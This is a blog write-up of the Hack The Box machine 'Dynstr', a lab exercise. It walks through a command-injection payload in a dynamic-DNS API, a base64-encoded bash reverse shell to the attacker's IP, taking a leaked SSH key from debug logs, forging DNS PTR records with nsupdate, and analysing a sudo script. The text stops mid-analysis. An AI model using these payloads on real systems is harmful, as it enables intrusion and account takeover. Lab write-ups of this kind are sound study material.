<!DOCTYPE html><html lang="en" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="Hackthebox - Dynstr" /><meta property="og:locale" content="en" /><meta name="description" content="Just another hackthebox writeups website powered by poorduck" /><meta property="og:description" content="Just another hackthebox writeups website powered by poorduck" /><link rel="canonical" href="https://x00tex.github.io/posts/dynstr/" /><meta property="og:url" content="https://x00tex.github.io/posts/dynstr/" /><meta property="og:site_name" content="Poorduck" /><meta property="og:image" content="https://x00tex.github.io/assets/img/posts/dynstr/dynstr_banner.png" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-06-14T18:30:00+00:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="https://x00tex.github.io/assets/img/posts/dynstr/dynstr_banner.png" /><meta property="twitter:title" content="Hackthebox - Dynstr" /><meta name="twitter:site" content="@p00rduck" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2021-06-14T18:30:00+00:00","datePublished":"2021-06-14T18:30:00+00:00","description":"Just another hackthebox writeups website powered by poorduck","headline":"Hackthebox - Dynstr","image":"https://x00tex.github.io/assets/img/posts/dynstr/dynstr_banner.png","mainEntityOfPage":{"@type":"WebPage","@id":"https://x00tex.github.io/posts/dynstr/"},"url":"https://x00tex.github.io/posts/dynstr/"}</script><title>Hackthebox - Dynstr | Poorduck</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Poorduck"><meta name="application-name" content="Poorduck"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get MODE_ATTR() { return "data-mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } static get ID() { return "mode-toggle"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } let self = this; /* always follow the system prefers */ this.sysDarkPrefers.addEventListener("change", () => { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.notify(); }); } /* constructor() */ get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; } get isLightMode() { return this.mode === ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer)) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } setDark() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_ATTR); sessionStorage.removeItem(ModeToggle.MODE_KEY); } /* Notify another plugins that the theme mode has changed */ notify() { window.postMessage({ direction: ModeToggle.ID, message: this.modeStatus }, "*"); } } /* ModeToggle */ const toggle = new ModeToggle(); function flipMode() { if (toggle.hasMode) { if (toggle.isSysDarkPrefer) { if (toggle.isLightMode) { toggle.clearMode(); } else { toggle.setLight(); } } else { if (toggle.isDarkMode) { toggle.clearMode(); } else { toggle.setDark(); } } } else { if (toggle.isSysDarkPrefer) { toggle.setLight(); } else { toggle.setDark(); } } toggle.notify(); } /* flipMode() */ </script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src=" /assets/img/poorduck.png " alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">Poorduck</a></div><div class="site-subtitle font-italic">Kwak kwak</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <button class="mode-toggle btn" aria-label="Switch Mode"> <i class="fas fa-adjust"></i> </button> <span class="icon-border"></span> <a href="https://github.com/x00tex" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/p00rduck" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['x00tex-writeups.3us6n','simplelogin.co'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>Hackthebox - Dynstr</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Hackthebox - Dynstr</h1><div class="post-meta text-muted"><div> By <em> <a href="https://twitter.com/p00rduck">p00rduck</a> </em></div><div class="d-flex"><div> <span> Posted <em class="timeago" data-ts="1623695400" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2021-06-14 </em> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1122 words"> <em>6 min</em> read</span></div></div></div><div class="post-content"><p><img data-src="/assets/img/posts/dynstr/dynstr_banner.png" alt="" data-proofer-ignore></p><p align="right"> <a href="https://www.hackthebox.eu/home/users/profile/391067" target="_blank"><img loading="lazy" alt="x00tex" data-src="https://www.hackthebox.eu/badge/image/391067" data-proofer-ignore></a></p><h1 id="enumeration">Enumeration</h1><p><strong>IP-ADDR:</strong> 10.10.10.244 dyna.htb</p><p><strong>nmap scan:</strong></p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre><td class="rouge-code"><pre>PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   3072 05:7c:5e:b1:83:f9:4f:ae:2f:08:e1:33:ff:f5:83:9e <span class="o">(</span>RSA<span class="o">)</span>
|   256 3f:73:b4:95:72:ca:5e:33:f6:8a:8f:46:cf:43:35:b9 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 cc:0a:41:b7:a1:9a:43:da:1b:68:f5:2a:f8:2a:75:2c <span class="o">(</span>ED25519<span class="o">)</span>
53/tcp open  domain  ISC BIND 9.16.1 <span class="o">(</span>Ubuntu Linux<span class="o">)</span>
| dns-nsid: 
|_  bind.version: 9.16.1-Ubuntu
80/tcp open  http    Apache httpd 2.4.41 <span class="o">((</span>Ubuntu<span class="o">))</span>
|_http-server-header: Apache/2.4.41 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: Dyna DNS
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel
</pre></table></code></div></div><p><strong>From web application</strong></p><p><img data-src="/assets/img/posts/dynstr/web-app.png" alt="" data-proofer-ignore></p><ul><li>Found Email <code class="language-plaintext highlighter-rouge">E: dns@dyna.htb</code> on http server <strong>Port 80</strong><li>Domain: <strong>dyna.htb</strong><li>Found beta creds in home page <strong>dynadns:sndanyd</strong><li><strong>Gobuster</strong> Found <code class="language-plaintext highlighter-rouge">/nic/update</code></ul><h1 id="foothold">Foothold</h1><h2 id="isc-bind-dnsserver"><span class="mr-2">ISC BIND DNSserver</span><a href="#isc-bind-dnsserver" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><ul><li>dns server is <strong>ISC BIND 9.16.1</strong><ul><li><strong><a href="https://www.isc.org/bind/">ISC BIND</a>:</strong> is an open source system free to download and use, offered under the Mozilla Public License. BIND can be used to run a caching DNS server or an authoritative name server, and provides features like load balancing, notify, dynamic update, split DNS, DNSSEC, IPv6, and more.<li>Running <strong>Version: 9.16.1</strong><li><a href="https://kb.isc.org/docs/aa-00913">Bind Security Advisories</a></ul></ul><p><code class="language-plaintext highlighter-rouge">/nic/update</code> returning “badauth”</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>❯ curl http://10.10.10.244/nic/update
badauth
</pre></table></code></div></div><p>Doing basic auth with creds <code class="language-plaintext highlighter-rouge">dynadns:sndanyd</code> on <code class="language-plaintext highlighter-rouge">/nic/update</code> with header <code class="language-plaintext highlighter-rouge">Authorization: Basic ZHluYWRuczpzbmRhbnlk</code> get diffrent response.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>❯ curl <span class="nt">-s</span> <span class="s1">'http://dyna.htb/nic/update'</span>
badauth
❯ curl <span class="nt">-s</span> <span class="s1">'http://dynadns:sndanyd@dyna.htb/nic/update'</span>
nochg 10.10.15.71
</pre></table></code></div></div><p>This endpoint talking to Bind DNS server using <a href="https://help.dyn.com/remote-access-api/">Dynamic DNS Update API</a> specifications.</p><p>Dynamic DNS (DDNS) is a service that keeps the DNS updated with a web property’s correct IP address, even if that IP address is constantly being updated. <em>Source <a href="https://www.cloudflare.com/en-in/learning/dns/glossary/dynamic-dns/">cloudflare.com</a></em></p><p>This web application providing Dynamic DNS for a number of domains: <code class="language-plaintext highlighter-rouge">dnsalias.htb</code>, <code class="language-plaintext highlighter-rouge">dynamicdns.htb</code>, <code class="language-plaintext highlighter-rouge">no-ip.htb</code></p><p>With API, We can update DDNS from <a href="https://help.dyn.com/remote-access-api/perform-update/">perform-update</a></p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>http://<span class="o">{</span>username<span class="o">}</span>:<span class="o">{</span>password<span class="o">}</span>@members.dyndns.org/nic/update?hostname<span class="o">={</span>yourhostname<span class="o">}</span>&amp;myip<span class="o">={</span>ipaddress<span class="o">}</span>&amp;wildcard<span class="o">=</span>NOCHG&amp;mx<span class="o">=</span>NOCHG&amp;backmx<span class="o">=</span>NOCHG
</pre></table></code></div></div><p>That way we can Create/Update Dynamic DNS entry</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>❯ curl <span class="s1">'http://dynadns:sndanyd@dyna.htb/nic/update?hostname=test.dnsalias.htb&amp;myip=10.10.15.71'</span>
good 10.10.14.41
</pre></table></code></div></div><h2 id="command-injection-in-dyn-api"><span class="mr-2">Command Injection in Dyn API</span><a href="#command-injection-in-dyn-api" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>Doing fuzzing with ffuf found special character injection</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>❯ ffuf <span class="nt">-w</span> /usr/share/seclists/Fuzzing/special-chars.txt <span class="nt">-u</span> <span class="s1">'http://dynadns:sndanyd@dyna.htb/nic/update?hostname=FUZZ.dnsalias.htb&amp;myip=0.0.0.0'</span> <span class="nt">-ac</span> <span class="nt">-v</span> <span class="nt">-c</span>

<span class="c"># ... [snip] ...</span>

<span class="o">[</span>Status: 200, Size: 76, Words: 6, Lines: 5]
| URL | http://dynadns:sndanyd@dyna.htb/nic/update?hostname<span class="o">=</span><span class="s2">".dnsalias.htb&amp;myip=0.0.0.0
    * FUZZ: "</span>

:: Progress: <span class="o">[</span>32/32] :: Job <span class="o">[</span>1/1] :: 13 req/sec :: Duration: <span class="o">[</span>0:00:05] :: Errors: 0 ::
</pre></table></code></div></div><p>get detailed response</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>❯ curl <span class="s1">'http://dynadns:sndanyd@dyna.htb/nic/update?hostname=".dnsalias.htb&amp;myip=0.0.0.0'</span>
server 127.0.0.1
zone dnsalias.htb
update delete .dnsalias.htb
good 0.0.0.0
</pre></table></code></div></div><p>And get command injection</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>❯ curl <span class="s1">'http://dynadns:sndanyd@dyna.htb/nic/update?hostname=`id`".dnsalias.htb&amp;myip=0.0.0.0'</span>
server 127.0.0.1
zone dnsalias.htb
update delete <span class="nv">uid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span>.dnsalias.htb
good 0.0.0.0
</pre></table></code></div></div><p>Getting reverse shell</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre><span class="nb">echo</span> <span class="s2">"bash -i &amp;&gt; /dev/tcp/10.10.15.71/4141 0&gt;&amp;1"</span> | <span class="nb">base64</span>   <span class="c">#encode reverse shell</span>
<span class="nb">echo</span>+<span class="s2">"YmFzaCAtaSAmPiAvZGV2L3RjcC8xMC4xMC4xNS43MS80MTQxIDA%2BJjEK"</span>+|+base64+-d+|+bash    <span class="c">#payload</span>

curl <span class="s1">'http://dynadns:sndanyd@dyna.htb/nic/update?hostname=`echo+"YmFzaCAtaSAmPiAvZGV2L3RjcC8xMC4xMC4xNS43MS80MTQxIDA%2BJjEK"+|+base64+-d+|+bash`".dnsalias.htb&amp;myip=0.0.0.0'</span>
</pre></table></code></div></div><p><img data-src="/assets/img/posts/dynstr/rev_shell.png" alt="" data-proofer-ignore></p><h1 id="privesc">Privesc</h1><h2 id="dns-pointer-recordptr"><span class="mr-2">DNS pointer record(PTR)</span><a href="#dns-pointer-recordptr" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>User “bindmgr” have .ssh directory which contains ssh key, but can’t read private key.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre><span class="o">(</span>remote<span class="o">)</span> www-data@dynstr.dyna.htb:/home/bindmgr/.ssh<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-l</span>
total 16
<span class="nt">-rw-r--r--</span> 1 bindmgr bindmgr  419 Mar 13 12:00 authorized_keys
<span class="nt">-rw-------</span> 1 bindmgr bindmgr 1823 Mar 13 11:48 id_rsa
<span class="nt">-rw-r--r--</span> 1 bindmgr bindmgr  395 Mar 13 11:48 id_rsa.pub
<span class="nt">-rw-r--r--</span> 1 bindmgr bindmgr  444 Mar 13 12:09 known_hosts
</pre></table></code></div></div><p>User’s home directory contains some debug log in <code class="language-plaintext highlighter-rouge">/home/bindmgr/support-case-C62796521</code></p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre><span class="o">(</span>remote<span class="o">)</span> www-data@dynstr.dyna.htb:/home/bindmgr<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-l</span>
total 8
drwxr-xr-x 2 bindmgr bindmgr 4096 Mar 13 14:53 support-case-C62796521
</pre></table></code></div></div><p>that folder contains some debug output in which, found private ssh key of user “bindmgr”</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre><span class="o">(</span>remote<span class="o">)</span> www-data@dynstr.dyna.htb:/home/bindmgr/support-case-C62796521<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-l</span> 
total 428
<span class="nt">-rw-r--r--</span> 1 bindmgr bindmgr 237141 Mar 13 14:53 C62796521-debugging.script
<span class="nt">-rw-r--r--</span> 1 bindmgr bindmgr  29312 Mar 13 14:53 C62796521-debugging.timing
<span class="nt">-rw-r--r--</span> 1 bindmgr bindmgr   1175 Mar 13 14:53 command-output-C62796521.txt
<span class="nt">-rw-r--r--</span> 1 bindmgr bindmgr 163048 Mar 13 14:52 strace-C62796521.txt
</pre></table></code></div></div><p><img data-src="/assets/img/posts/dynstr/private-rsa.png" alt="" data-proofer-ignore></p><p>but ssh key is not working.</p><p>looking into <code class="language-plaintext highlighter-rouge">/home/bindmgr/.ssh/authorized_keys</code> which contains <code class="language-plaintext highlighter-rouge">from="*.infra.dyna.htb"</code>. That means <code class="language-plaintext highlighter-rouge">AnyHost.infra.dyna.htb</code> can login to user “bindmgr” with his private key.</p><p>A <a href="https://www.cloudflare.com/en-in/learning/dns/dns-records/dns-ptr-record/">DNS pointer record</a> (PTR for short) provides the domain name associated with an IP address. A DNS PTR record is exactly the opposite of the ‘A’ record, which provides the IP address associated with a domain name. DNS PTR records are used in reverse DNS lookups.</p><p>we can add PTR record into infra dynamic dns associated to our tun0 ip, which resolve <code class="language-plaintext highlighter-rouge">AnyHost.infra.dyna.htb</code> with our ip address and allow us to ssh with “bindmgr” ssh key.</p><p><a href="https://linux.die.net/man/8/nsupdate"><code class="language-plaintext highlighter-rouge">nsupdate</code></a> allow to ad PTR record.</p><p>The <code class="language-plaintext highlighter-rouge">-k</code> may also be used to specify a SIG(0) key used to authenticate Dynamic DNS update requests. In this case, the key specified is not an HMAC-MD5 key. and we need to update PTR record in “infra” Dynamic DNS, That means we need “infra” Dynamic DNS private key, which found in <code class="language-plaintext highlighter-rouge">/etc/bind/infra.key</code>.</p><p><a href="https://superuser.com/questions/977132/when-using-nsupdate-to-update-both-a-and-ptr-records-why-do-i-get-update-faile">Solution</a> for adding PTR record with <code class="language-plaintext highlighter-rouge">nsupdate</code>.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>nsupdate <span class="nt">-k</span> /etc/bind/infra.key
update add gotcha.infra.dyna.htb. 86400 A 10.10.15.71
&lt;Enter&gt;
update add 71.15.10.10.in-addr.arpa. 300 PTR gotcha.infra.dyna.htb.
send
</pre></table></code></div></div><p><img data-src="/assets/img/posts/dynstr/got-user.png" alt="" data-proofer-ignore></p><h2 id="wildcard-in-cp-command"><span class="mr-2">Wildcard in <code class="language-plaintext highlighter-rouge"><span class="mr-2">cp</code> Command</span><a href="#wildcard-in-cp-command" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>user “bindmgr” can run <code class="language-plaintext highlighter-rouge">/usr/local/bin/bindmgr.sh</code> as any user with NOPASSWD as sudo.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>bindmgr@dynstr:~<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
<span class="nb">sudo</span>: unable to resolve host dynstr.dyna.htb: Name or service not known
Matching Defaults entries <span class="k">for </span>bindmgr on dynstr:
    env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin

User bindmgr may run the following commands on dynstr:
    <span class="o">(</span>ALL<span class="o">)</span> NOPASSWD: /usr/local/bin/bindmgr.sh
</pre></table></code></div></div><p><strong><code class="language-plaintext highlighter-rouge">/usr/local/bin/bindmgr.sh</code> script breakdown</strong></p><p>This code checks <code class="language-plaintext highlighter-rouge">.version</code> file in current directory and its content</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre><td class="rouge-code"><pre><span class="c">#!/bin/bash</span>

<span class="nv">BINDMGR_CONF</span><span class="o">=</span>/etc/bind/named.conf.bindmgr
<span class="nv">BINDMGR_DIR</span><span class="o">=</span>/etc/bind/named.bindmgr

indent<span class="o">()</span> <span class="o">{</span> <span class="nb">sed</span> <span class="s1">'s/^/    /'</span><span class="p">;</span> <span class="o">}</span>

<span class="nb">echo</span> <span class="s2">"[+] Running </span><span class="nv">$0</span><span class="s2"> to stage new configuration from </span><span class="nv">$PWD</span><span class="s2">."</span>
<span class="k">if</span> <span class="o">[[</span> <span class="o">!</span> <span class="nt">-f</span> .version <span class="o">]]</span> <span class="p">;</span> <span class="k">then
    </span><span class="nb">echo</span> <span class="s2">"[-] ERROR: Check versioning. Exiting."</span>
    <span class="nb">exit </span>42
<span class="k">fi
if</span> <span class="o">[[</span> <span class="s2">"</span><span class="sb">`</span><span class="nb">cat</span> .version 2&gt;/dev/null<span class="sb">`</span><span class="s2">"</span> <span class="nt">-le</span> <span class="s2">"</span><span class="sb">`</span><span class="nb">cat</span> <span class="nv">$BINDMGR_DIR</span>/.version 2&gt;/dev/null<span class="sb">`</span><span class="s2">"</span> <span class="o">]]</span> <span class="p">;</span> <span class="k">then
    </span><span class="nb">echo</span> <span class="s2">"[-] ERROR: Check versioning. Exiting."</span>
    <span class="nb">exit </span>43
<span class="k">fi</span>
</pre></table></code></div></div><p>Than adding all file names from current directory in <code class="language-plaintext highlighter-rouge">named.conf.bindmgr</code> config file.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre><span class="c"># Create config file that includes all files from named.bindmgr.</span>
<span class="nb">echo</span> <span class="s2">"[+] Creating </span><span class="nv">$BINDMGR_CONF</span><span class="s2"> file."</span>
<span class="nb">printf</span> <span class="s1">'// Automatically generated file. Do not modify manually.\n'</span> <span class="o">&gt;</span> <span class="nv">$BINDMGR_CONF</span>
<span class="k">for </span>file <span class="k">in</span> <span class="k">*</span> <span class="p">;</span> <span class="k">do
    </span><span class="nb">printf</span> <span class="s1">'include "/etc/bind/named.bindmgr/%s";\n'</span> <span class="s2">"</span><span class="nv">$file</span><span class="s2">"</span> <span class="o">&gt;&gt;</span> <span class="nv">$BINDMGR_CONF</span>
<span class="k">done</span>
</pre></table></code></div></div><p>copy <code class="language-plaintext highlighter-rouge">.version</code> and all other files with a wildcard from current directory to <code class="language-plaintext highlighter-rouge">/etc/bind/named.bindmgr/</code></p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre><span class="c"># Stage new version of configuration files.</span>
<span class="nb">echo</span> <span class="s2">"[+] Staging files to </span><span class="nv">$BINDMGR_DIR</span><span class="s2">."</span>
<span class="nb">cp</span> .version <span class="k">*</span> /etc/bind/named.bindmgr/
